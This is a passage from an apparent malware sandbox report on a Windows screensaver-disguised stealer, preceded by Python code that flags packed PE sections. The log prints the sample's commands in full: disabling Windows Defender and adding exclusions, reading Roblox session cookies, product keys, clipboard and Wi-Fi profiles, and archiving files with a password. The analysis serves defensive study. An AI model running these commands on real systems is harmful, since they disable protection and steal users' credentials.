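    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # section table follows the optional header
    for i in range(num_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)  # SizeOfRawData, PointerToRawData
        yield name, pe[raw_ptr:raw_ptr + raw_size]


def assess_section(name: str, data: bytes, threshold: float = 0.95) -> dict:
    """Per-section verdict. The 0.95 threshold is an assumption for this example, not a report value."""
    c = zlib_complexity(data)
    return {
        "section": name,
        "zlib_complexity": round(c, 4),
        "entropy": round(shannon_entropy(data), 2),
        "packed_or_encrypted": c >= threshold,
        "upx_layout": name.upper().startswith("UPX"),
    }


def assess_pe(pe: bytes, threshold: float = 0.95) -> list:
    return [assess_section(n, d, threshold) for n, d in iter_sections(pe)]


def build_minimal_pe(sections) -> bytes:
    """Constructed test input: a skeletal PE32+ (DOS header, file header, zeroed optional header,
    section table, 512-byte-aligned raw data). It parses but is not a loadable executable."""
    opt_size = 240
    raw_base = (64 + 24 + opt_size + 40 * len(sections) + 511) // 512 * 512
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew = 64
    file_hdr = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    opt_hdr = struct.pack("<H", 0x20B) + b"\0" * (opt_size - 2)  # PE32+ magic, rest zeroed
    table, blobs = b"", b""
    for i, (name, data) in enumerate(sections):
        raw_size = (len(data) + 511) // 512 * 512
        table += name.ljust(8, b"\0")[:8] + struct.pack(
            "<IIII", len(data), 0x1000 * (i + 1), raw_size, raw_base + len(blobs)) + b"\0" * 16
        blobs += data.ljust(raw_size, b"\0")
    headers = dos + b"PE\0\0" + file_hdr + opt_hdr + table
    return headers.ljust(raw_base, b"\0") + blobs


# Constructed sample: UPX0 empty, UPX1 holding seeded pseudo-random bytes (stand-in for a
# compressed payload), .rsrc holding highly repetitive data.
_rng = random.Random(0x5EED)
SAMPLE_PE = build_minimal_pe([
    (b"UPX0", b""),
    (b"UPX1", _rng.randbytes(64 * 1024)),
    (b".rsrc", b"MZ" + b"\0" * 4096 + b"VS_VERSION_INFO" * 256),
])

if __name__ == "__main__":
    for verdict in assess_pe(SAMPLE_PE):
        print(verdict)
```

On real input, `assess_pe(open(path, "rb").read())` over each file in `_MEI17882` reproduces the report's numbers; a section that scores near 1.0 without a `UPX*` name is the case worth a second look, since that points at a custom packer or an encrypted payload rather than a stock UPX layer that `upx -d` will strip.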
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@144/95@2/2
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE18560 GetLastError,FormatMessageW,WideCharToMultiByte, 0_2_00007FF73AE18560
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7ECB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 68_2_00007FF7F7ECB57C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E9EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 68_2_00007FF7F7E9EF50
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EA3144 GetDiskFreeSpaceExW, 68_2_00007FF7F7EA3144
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Mutant created: \Sessions\1\BaseNamedObjects\x
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882 Jump to behavior
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U202f#U202f#U2005#U00a0.scr.exe ReversingLabs: Detection: 71%
Source: #U202f#U202f#U2005#U00a0.scr.exe Virustotal: Detection: 72%
Source: #U202f#U202f#U2005#U00a0.scr.exe String found in binary or memory: set-addPolicy
Source: #U202f#U202f#U2005#U00a0.scr.exe String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File read: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
Source: unknown Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
